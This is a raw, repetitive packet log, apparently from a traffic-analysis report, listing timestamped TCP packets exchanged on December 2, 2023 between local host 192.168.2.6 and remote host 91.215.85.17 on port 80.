                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.389461040 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.389473915 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.389519930 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.389522076 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.389578104 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.389591932 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.389605999 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.389640093 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.389668941 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.389672995 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.389688015 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.389699936 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.389712095 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.389735937 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.389738083 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.389755011 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.389801979 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.389816046 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.389827967 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.389841080 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.389864922 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.389892101 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.389905930 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.389929056 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.389952898 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.389966011 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.390007019 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.390019894 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.390033007 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.390055895 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.390083075 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.390088081 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.390101910 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.390115023 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.390126944 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.390132904 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.390140057 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.390156031 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.390189886 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.390193939 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.390264034 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.390279055 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.390331030 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.390347004 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.390361071 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.390372992 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.390397072 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.390409946 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.390429020 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.390463114 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.390464067 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.390477896 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.390490055 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.390522957 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.390522957 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.390549898 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.390582085 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.390594959 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.390603065 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.390630960 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.390660048 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.390672922 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.390685081 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.390698910 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.390719891 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.390748024 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.390753031 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.390767097 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.390795946 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.390815973 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.390829086 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.390841007 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.390852928 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.390865088 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.390875101 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.390907049 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.390907049 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.390928030 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.390940905 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.390950918 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.390975952 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.390997887 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.391025066 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.391030073 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.391103029 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.391115904 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.391128063 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.391161919 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.391165018 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.391180038 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.391206026 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.391217947 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.391231060 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.391266108 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.391294956 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.391297102 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.391310930 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.391321898 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.391335011 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.391346931 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.391355038 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.391376972 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.391437054 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.391449928 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.391463041 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.391474962 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.391498089 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.391525984 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.391555071 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.391566992 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.391580105 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.391592979 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.391623020 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.391623020 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.391655922 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.391669035 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.391680956 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.391697884 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.391715050 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.391721964 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.391727924 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.391740084 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.391760111 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.391772985 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.391804934 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.391817093 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.391844988 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.391849995 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.391864061 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.391865015 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.391923904 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.391937971 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.391963005 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.391983986 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.391984940 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.392055035 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.392102957 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.392113924 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.392235041 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.392247915 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.392258883 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.392271996 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.392283916 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.392290115 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.392291069 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.392303944 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.392319918 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.392321110 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.392333984 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.392358065 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.392388105 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.392390013 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.392402887 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.392415047 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.392426968 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.392438889 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.392447948 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.392467976 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.392468929 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.392484903 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.392498016 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.392534971 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.392561913 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.392642021 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.392654896 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.392666101 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.392678976 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.392700911 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.392716885 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.392721891 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.392730951 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.392743111 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.392755985 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.392767906 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.392784119 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.392801046 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.392802000 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.392813921 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.392827034 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.392849922 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.392875910 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.392904997 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.392918110 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.392952919 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.392961979 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.392966986 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.392991066 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.393002987 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.393014908 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.393042088 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.393059969 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.393074036 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.393126965 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.393140078 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.393172026 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.393178940 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.393188953 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.393193007 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.393234015 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.393254042 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.393260956 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.393292904 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.393302917 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.393364906 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.393383026 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.393394947 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.393414021 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.393420935 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.393435955 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.393449068 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.393449068 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.393460989 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.393490076 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.393518925 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.393524885 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.393593073 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.393605947 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.393618107 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.393630028 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.393637896 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.393665075 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.393681049 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.393703938 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.393716097 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.393727064 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.393754959 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.393784046 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.393798113 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.393810987 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.393821955 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.393834114 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.393858910 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.393887997 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.412254095 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.617111921 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.714874983 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.755803108 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.755881071 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:44.981446028 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.001102924 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.008342028 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.008342981 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.233916044 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.252476931 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.252490997 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.252505064 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.252516985 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.252527952 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.252569914 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.252583981 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.252595901 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.252593994 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.252609015 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.252677917 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.252677917 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.252762079 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.252775908 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:45.252785921 CET804972091.215.85.17192.168.2.6
